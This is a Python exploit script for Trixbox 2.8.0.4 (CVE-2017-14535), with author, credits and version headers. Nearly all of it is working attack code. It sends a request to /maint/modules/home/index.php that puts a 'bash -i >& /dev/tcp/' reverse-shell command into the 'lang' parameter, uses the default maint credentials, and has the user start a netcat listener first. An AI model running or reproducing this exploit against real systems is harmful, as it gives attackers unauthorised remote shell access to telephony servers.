# Exploit Title: Trixbox 2.8.0.4 - 'lang' Remote Code Execution (Unauthenticated) # Date: 27.05.2021 # Exploit Author: Ron Jost (Hacker5preme) # Credits to: https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/ # Credits to: Sachin Wagh # Vendor Homepage: https://sourceforge.net/projects/asteriskathome/ # Software Link: https://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/trixbox%202.8/trixbox-2.8.0.4.iso/download # Version: 2.8.0.4 # Tested on: Xubuntu 20.04 # CVE: CVE-2017-14535 ''' Description: trixbox 2.8.0.4 has OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php ''' ''' Import required modules: ''' import requests import sys import time ''' User-input: ''' target_ip = sys.argv[1] target_port = sys.argv[2] listen_ip = sys.argv[3] listen_port = sys.argv[4] ''' Construct malicious request: ''' # Construct header: header = { 'Host': target_ip, 'User-Agent': 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Authorization': 'Basic bWFpbnQ6cGFzc3dvcmQ=', 'Connection': 'close', 'Upgrade-Insecure-Requests': '1', 'Cache-Control': 'max-age=0' } # Construct malicious link: link_p1 = 'http://' + target_ip + ':' + target_port + '/maint/modules/home/index.php?lang=english|bash%20-i%20%3E%26%20' link_p2 = '%2Fdev%2Ftcp%2F' + listen_ip + '%2F' + listen_port + '%200%3E%261||x' link = link_p1 + link_p2 ''' Finish: EXPLOIT!!! ''' print('') print('') print('Please start the following command in a seperate terminal: nc -lnvp ' + listen_port) print('') time.sleep(2) Ready = input("If you're done and want to start the exploit please input EXPLOIT: ") if Ready == 'EXPLOIT': print('') print('Exploit sent, check your Netcat instance :)') x = requests.post(link, headers=header) else: print('TRY AGAIN')